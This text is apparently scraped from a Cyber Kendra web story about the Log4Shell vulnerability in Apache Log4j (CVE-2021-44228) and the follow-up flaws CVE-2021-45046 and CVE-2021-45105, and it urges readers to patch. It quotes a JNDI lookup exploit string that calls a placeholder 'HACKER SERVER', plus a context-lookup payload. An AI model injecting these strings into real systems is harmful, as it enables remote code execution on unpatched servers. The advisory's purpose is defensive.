Log4Shell

Is a 0day vulnerability in Apache Log4j Utility

??

CVE-2021-44228

www.cyberkendra.com

Internet is on Fire

Billions of vulnerable Applications

Worst 0-day for Internet

Details on 

Arrow

Open URL

CVE-2021-44228

Don't panic. Be Calm!

Log4Shell

Critical & Easy Remote Code Execution 

Exploit: ${jndi:ldap://HACKER SERVER/exp}

White Twitter

Organization        to Patch The System

Running
Laptop Full

Second Flaw

It was DoS but Later Changed to RCE

Reported by : iCConsult Kai Mindermann

CVE-2021-45046

White Twitter

Log4j 2.16.0  Released

Third Flaw

It is a dos vulnerability 

White Twitter

Reported by : Hideki Okamoto 

CVE-2021-45105

Log4j 2.17.0  Released

Exploits in Non Default Condition

Payload: $${ctx:loginId})

Advisory

Update Your System ASAP

Ransomware attacks also observed.

Fix it Before Hackers Enters

Advisory | Resource | Exploits

@CyberKendra

Updates

White Twitter